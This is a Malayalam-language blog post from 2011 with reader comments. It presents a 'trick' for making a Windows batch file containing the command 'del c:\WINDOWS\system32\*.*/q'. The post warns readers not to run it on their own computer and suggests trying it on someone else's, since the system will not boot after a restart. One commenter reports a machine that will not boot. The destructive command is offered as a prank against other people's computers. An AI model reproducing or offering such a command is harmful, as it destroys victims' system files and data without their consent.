Monday, January 3, 2011

10:11 AM
3

ഈ ട്രിക്ക് നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ ചെക്ക്‌ ചെയ്തു എന്ത് സംഭവിച്ചാലും നിങ്ങള്‍ നിങ്ങളുടെ പാട്ടിനു പോകേണ്ടി വരും ..ഒരു രീതിയിലും ഞാന്‍ ഉത്തരവാദി ആകില്ല..

1 - ആദ്യം notpad ഓപ്പണ്‍ ചെയ്യുക
2- del c:\WINDOWS\system32\*.*/q ഈ കാണുന്ന കമാന്‍ഡ് നോട്ട്പാടില്‍ കോപ്പി ചെയ്യുക
3- ശേഷം നോട്ട്പാട് സേവ് ചെയ്യുക.. സേവ് ചെയ്യുമ്പോള്‍ ഏതെങ്കിലും ഒരു പേരിന്റെ കൂടെ .bat അല്ലെങ്കില്‍ .cmd എന്ന് സേവ് ചെയ്യുക..
ഉദാഹരണമായി .. MUNEER  എന്ന പേരില്‍ ആണ് നിങ്ങള്‍ സേവ് ചെയ്യാന്‍ ഉദ്ദേശിച്ചതെങ്കില്‍ MUNEER.bat എന്ന് ടൈപ്പ് ചെയ്തു സേവ് ചെയ്യുക..
4- ഇനി പറയുന്നത് ശ്രദ്ധിക്കുക ***** സേവ് ചെയ്ത ഫയല്‍ ഒരിക്കലും നിങ്ങള്‍ ക്ലിക്കരുത് ..ക്ലിക്കിയാല്‍ കമ്പ്യൂട്ടറില്‍ ഒന്നും സംഭവിക്കില്ല ...പക്ഷെ സംഭവാമി യുഗേ യുഗേ.. റീസ്റ്റാര്‍ട്ട്‌ ചെയ്താല്‍ സിസ്റ്റം വര്‍ക്ക്‌ ആകില്ല.. അപ്പൊ ഏതെങ്കിലും അലവലാതിയുടെ കമ്പ്യൂട്ടറില്‍ പരീക്ഷണം നടത്തണം എന്ന് സാരം

======================================================
ഇനി അഥവാ  ക്ലിക്കിയാല്‍  സിസ്റ്റം ഫോര്‍മാറ്റ്‌  ചെയ്യല്‍ നിര്‍ബന്ധം ആണ് .കാരണം  ഇത്  നിങ്ങളുടെ കമ്പ്യൂട്ടറിന്റെ system32  ഫയല്‍  ഡിലീറ്റ് ചെയ്യുകയാണ് ..

3 comments:

  1. വേണ്ടാത്ത പണി ആളുകള്‍ക്ക് പറഞ്ഞ് കൊടുത്ത് മറ്റുള്ളവരുടെ പ്രാക്ക് സമ്പാദിക്കണോ മുനീരേ?
    സിസ്റ്റം തീരെ ബൂട്ട് ആവുന്നില്ല. എന്തായിരിക്കും കാരണം? ഹാര്‍ഡ്‌വെയര്‍ ഫെയില്‍? അതോ മറ്റു വല്ലതും ഒന്ന് പറഞ്ഞ് തരാമോ? ഒരു പോസ്റ്റായി ഇടൂ

    ReplyDelete
  2. ഇസ്മില്‍ ഇക്ക കമ്പ്യൂട്ടറിന്റെ problem പൂര്‍ണമായി പറയു ..നമുക്ക് പരിഹാരം ഉണ്ടാകാം

    ReplyDelete
  3. drive engana partition chayyan kayiyum

    ReplyDelete
:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.

എന്തെങ്കിലുമൊക്കെ കുത്തികുറിച്ചോ..മറക്കേണ്ട ..

Related Posts Plugin for WordPress, Blogger...